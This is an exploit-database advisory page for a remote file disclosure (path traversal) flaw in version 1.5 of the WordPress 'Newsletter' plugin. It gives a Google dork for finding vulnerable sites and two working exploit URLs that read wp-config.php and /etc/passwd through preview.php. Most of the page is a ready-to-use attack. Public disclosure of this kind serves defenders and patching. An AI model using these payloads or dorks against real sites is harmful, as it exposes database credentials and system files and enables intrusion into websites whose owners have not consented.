[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability
# Published : 2012-06-08
# Author :
# Previous Title : PBBoard 2.1.4 Local File Inclusion
# Next Title : Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability


##################################################
# Description : Wordpress Plugins - Plugin: Newsletter Remote File 
Disclosure Vulnerability
# Version : 1.5
# Link : http://wordpress.org/extend/plugins/plugin-newsletter/
# Plugins : http://downloads.wordpress.org/plugin/plugin-newsletter.zip
# Date : 31-05-2012
# Google Dork : inurl:/wp-content/plugins/plugin-newsletter/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php

Read source [CTRL-u]

http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../../../../../etc/passwd

Read source [CTRL-u]